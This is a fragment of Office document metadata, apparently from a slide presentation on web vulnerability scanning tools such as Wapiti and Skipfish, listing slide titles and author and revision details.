      <vt:lpstr>Web scanning tools – how they work</vt:lpstr>
      <vt:lpstr>Web scanning - HTTP requests</vt:lpstr>
      <vt:lpstr>Wapiti – sample results</vt:lpstr>
      <vt:lpstr>Skipfish – sample results</vt:lpstr>
      <vt:lpstr>Things to avoid</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>An incident in September 2008</vt:lpstr>
      <vt:lpstr>Thank you!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Sebastian Lopienski</dc:creator>
  <cp:lastModifiedBy>Sebastian Lopienski</cp:lastModifiedBy>
  <cp:revision>134</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-01-24T17:08:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-07-16T21:29:03Z</dcterms:modified>
</cp:coreProperties>
</file>